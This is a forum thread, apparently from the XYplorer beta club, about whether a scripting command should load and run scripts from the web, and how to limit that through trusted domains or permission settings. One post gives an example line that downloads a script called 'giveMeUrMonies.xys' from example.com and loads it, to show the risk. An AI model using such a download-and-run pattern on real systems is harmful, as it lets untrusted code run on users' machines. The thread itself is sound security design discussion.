Code: Select all
XYplorer Beta Club
"Show this script's filename"
self $a, "file";
msg $a;
-
"Download this script file"
self $a, "file";
download $a;
-
"Cancel"
I deleted your last post because it had dangerous information ready for copy+paste...TheQwerty wrote:Now this could be handy, but what happens if the page given redirects somewhere else?
Does XY notify the user or just proceed?
I'm thinking this could be extremely useful to provide a means of updating scripts.
I could simply limit it to http://www.xyplorer.com. You trust me otherwise you would not use my app.admin wrote:I deleted your last post because it had dangerous information ready for copy+paste...TheQwerty wrote:Now this could be handy, but what happens if the page given redirects somewhere else?
Does XY notify the user or just proceed?
I'm thinking this could be extremely useful to provide a means of updating scripts.
I think you are right, it has its downsides... damn it, it was such a nice idea...
Deleting that post is fine.. I really like the idea of this though. Just not sure it could ever be completely safe.admin wrote:I could simply limit it to http://www.xyplorer.com. You trust me otherwise you would not use my app.admin wrote:I deleted your last post because it had dangerous information ready for copy+paste...TheQwerty wrote:Now this could be handy, but what happens if the page given redirects somewhere else?
Does XY notify the user or just proceed?
I'm thinking this could be extremely useful to provide a means of updating scripts.
I think you are right, it has its downsides... damn it, it was such a nice idea...
It's the old trade off between freedom and safety.TheQwerty wrote:Deleting that post is fine.. I really like the idea of this though. Just not sure it could ever be completely safe.admin wrote:I could simply limit it to http://www.xyplorer.com. You trust me otherwise you would not use my app.admin wrote:I deleted your last post because it had dangerous information ready for copy+paste...TheQwerty wrote:Now this could be handy, but what happens if the page given redirects somewhere else?
Does XY notify the user or just proceed?
I'm thinking this could be extremely useful to provide a means of updating scripts.
I think you are right, it has its downsides... damn it, it was such a nice idea...
But I suppose that brings the question should you worry about it being completely safe, or strive for a safe enough means?
Restricting it to just your domain is okay, but allowing the user to maintain a list of trusted domains would be better.
Idea before you posted about domain restrictions:
Perhaps if you had another dat file for "secure" settings (so they can't be changed as easily as an INI file). Within this dat file you would store the registration info, a setting "Allow execution of remote scripts", and whatever else may be deemed protected. ("Allow Scripts to Modify Current XY Configuration"?).
Then we have to worry about ways that a script writer could transfer this protected file.
Indeed, but that was just a quick example. There are other items that would be nearly as useful as an XY license.admin wrote:It's the old trade off between freedom and safety.
If you load and execute an unknown script written by an unknown person then you are a person that likes to be surprised. I cannot protect you from yourself. I could make the warning bigger; i could make the whole thing a tweak, or a setting combined with a special warning.
License key fishing per scripting... well, you get cracked license keys for XYplorer around every corner anyway. It's really not worth the trouble.
> another dat file for "secure" settings
I would not like to change that. Lots of work to upgrade older versions, and only shifting the problem to another level (without solving it). I could more easily simply protect those particular keys from being read. It's my scripting engine, I can do anything with it.
And as the note says disallowing any of these means the script obviously cannot perform a SetKey on the current config, or it's kind of pointless (even if the change doesn't take affect until it is reloaded).Please note changing any of these settings also prevents scripts from changing values in the loaded XY Configuration.
Allow Scripts to...
[] Access the Internet
[] Delete Items
[] Read the Current XY Configuration
[] Restart XY
There is a prompt!lukescammell wrote:Definitely needs a prompt of some sort (perhaps like Firefox Extensions when you install them?).
And what if your computer explodes?lukescammell wrote:Also, what if your web server gets hacked?
Okay, that works around the trusted domains thing. Hmm. Either I restrict the download command too (which would be ridiculuous), or I can forget about that trusted domains checking right away.TheQwerty wrote:Actually Don, I don't think this is going to work out either.
The same problems exist with Download and Load:
::Download("http://www.example.com/offendingScript. ... Monies.xys", "o");Load("%temp%\giveMeUrMonies.xys");
But many commands can be very dangerous and very useful at the same time. I would rather say: If the user feels uncomfortable with scripts, don't use them. Quick Scripting can be turned off ever since.TheQwerty wrote:I have to say I'm really thinking adding Script Command Permissions would make the most sense.
Indeed, you're right in that ultimately the responsibility of running safe scripts lies with the user and no system short of completely removing scripting will be without risks.admin wrote:But generally about the security issue. You always start with running a local script. Either you have written it yourself, or somebody gave it to you. It should be clear that you should never run scripts whose content you don't know or understand, OR whose author you don't trust.
But many commands can be very dangerous and very useful at the same time. I would rather say: If the user feels uncomfortable with scripts, don't use them. Quick Scripting can be turned off ever since.TheQwerty wrote:I have to say I'm really thinking adding Script Command Permissions would make the most sense.